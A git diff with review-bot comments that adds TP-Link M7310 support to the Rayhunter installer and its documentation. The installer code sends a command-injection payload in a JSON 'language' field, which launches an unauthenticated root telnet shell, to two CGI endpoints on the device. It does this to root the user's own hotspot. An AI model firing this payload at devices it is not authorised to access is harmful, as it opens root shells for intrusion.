diff --git a/doc/SUMMARY.md b/doc/SUMMARY.md index 255725f..f0d54be 100644 --- a/doc/SUMMARY.md +++ b/doc/SUMMARY.md @@ -12,6 +12,7 @@ - [How we analyze a capture](./analyzing-a-capture.md) - [Supported devices](./supported-devices.md) - [TP-Link M7350](./tplink-m7350.md) + - [TP-Link M7310](./tplink-m7310.md) - [Orbic RC400L](./orbic.md) - [Support, feedback, and community](./support-feedback-community.md) - [Frequently Asked Questions](./faq.md) diff --git a/doc/supported-devices.md b/doc/supported-devices.md index 0e0a7f9..f2a6ac6 100644 --- a/doc/supported-devices.md +++ b/doc/supported-devices.md @@ -6,3 +6,4 @@ If you have a device in mind which you'd like Rayhunter to support, please [open - [Orbic RC400L](./orbic.md) - [TP-Link M7350](./tplink-m7350.md) +- [TP-Link M7310](./tplink-m7310.md) diff --git a/doc/tplink-m7310.md b/doc/tplink-m7310.md new file mode 100644 index 0000000..70946e2 --- /dev/null +++ b/doc/tplink-m7310.md @@ -0,0 +1,6 @@ +# TP-Link M7310 + +The TP-Link M7310 is **supported by Rayhunter since 0.3.5**. The device +works similarly to the [M7350](./tplink-m7350.md) and is essentially an older, +more expensive version of it. Hardware version v1.0 has been successfully +tested, later versions may work as well. diff --git a/installer/src/tplink.rs b/installer/src/tplink.rs index ac6c684..5c4cc9e 100644 --- a/installer/src/tplink.rs +++ b/installer/src/tplink.rs 
@@ -40,24 +40,28 @@ struct V3RootResponse {
 }
 
 pub async fn start_telnet(admin_ip: &str) -> Result {
-    let qcmap_web_cgi_endpoint = format!("http://{admin_ip}/cgi-bin/qcmap_web_cgi");
     let client = reqwest::Client::new();
 
     println!("Launching telnet on the device");
 
-    // https://github.com/advisories/GHSA-ffwq-9r7p-3j6r
-    // in particular: https://www.yuque.com/docs/share/fca60ef9-e5a4-462a-a984-61def4c9b132
-    let response = client.post(&qcmap_web_cgi_endpoint)
-        .body(r#"{"module": "webServer", "action": 1, "language": "EN';echo $(busybox telnetd -l /bin/sh);echo 1'"}"#)
-        .send()
-        .await?;
+    for endpoint in [
+        // TP-Link M7350 v3
+        // https://github.com/advisories/GHSA-ffwq-9r7p-3j6r
+        // in particular: https://www.yuque.com/docs/share/fca60ef9-e5a4-462a-a984-61def4c9b132
+        format!("http://{admin_ip}/cgi-bin/qcmap_web_cgi"),
+        // TP-Link M7310 v1
+        // (adaptation of M7350 exploit
+        format!("http://{admin_ip}/cgi-bin/web_cgi"),
+    ] {
+        let response = client.post(&endpoint)
+            .body(r#"{"module": "webServer", "action": 1, "language": "EN';echo $(busybox telnetd -l /bin/sh);echo 1'"}"#)
+            .send()
+            .await?;
 
-    let is_v3 = response.status() != 404;
+        if response.status() == 404 {
+            continue;
+        }
 
-    if !is_v3 {
-        println!("Got a 404 trying to run exploit for hardware revision v3, trying v5 exploit");
-        tplink_launch_telnet_v5(admin_ip).await?;
-    } else {
         let V3RootResponse { result } = response.error_for_status()?.json().await?;
 
         if result != 0 {
@@ -67,7 +71,7 @@ pub async fn start_telnet(admin_ip: &str) -> Result {
         // resetting the language is important because otherwise the tplink's admin interface is
         // unusuable.
         let V3RootResponse { result } = client
-            .post(&qcmap_web_cgi_endpoint)
+            .post(&endpoint)
             .body(r#"{"module": "webServer", "action": 1, "language": "en"}"#)
             .send()
             .await?
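Review bot: The injected command `busybox telnetd -l /bin/sh` in the new request body starts an unauthenticated root shell with no `-b` bind address, so it listens on every interface of the device, not only the LAN side the installer talks to. Whether the cellular/WAN side is firewalled is not visible in this file, so treat this as a caveat to confirm rather than a known exposure; if it is not, binding to the admin address (`-b <admin_ip>`, which would mean turning the raw-string body into a `format!` with the JSON braces escaped) would confine the shell to the LAN. This is pre-existing behaviour that the loop now repeats against a second endpoint, so it deserves at least a comment above the `.body(...)` line, e.g. `// NOTE: telnetd is started unauthenticated and listens on all interfaces; only run this on a trusted LAN`. Separately, the new comment `// (adaptation of M7350 exploit` is missing its closing parenthesis. The body of `start_telnet` continues past this hunk.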
@@ -80,12 +84,13 @@ pub async fn start_telnet(admin_ip: &str) -> Result {
         }
 
         println!("Detected hardware revision v3");
+        return Ok(true);
     }
 
-    println!(
-        "Succeeded in rooting the device! Now you can use 'telnet {admin_ip}' to get a root shell. Use './installer util tplink-start-telnet' to root again without installing rayhunter."
-    );
-    Ok(is_v3)
+    println!("Got a 404 trying to run exploit for hardware revision v3, trying v5 exploit");
+    tplink_launch_telnet_v5(admin_ip).await?;
+
+    Ok(false)
 }
 
 async fn tplink_run_install(
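Review bot: `return Ok(true)` and the `println!("Detected hardware revision v3")` just above it fire for whichever endpoint did not answer 404, so on an M7310 v1 (the second endpoint this commit adds) the user is told the device is an M7350 v3 and the caller receives the same `true` flag. If the bool is meant as "v3-style device" that may be intended, but the message is wrong for the new device; since `endpoint` is still in scope at this point, `println!("Rooted via {endpoint}, treating as hardware revision v3");` would report what actually happened. The removed "Succeeded in rooting the device! Now you can use 'telnet ...'" hint, which told the user how to reach the shell and how to re-root later, has no replacement on either the v3 path or the v5 path in this hunk; if it now lives in the caller or in `tplink_launch_telnet_v5` that is fine, otherwise it should be restored before `return Ok(true)` and before `Ok(false)`. The start of `start_telnet` lies outside this hunk.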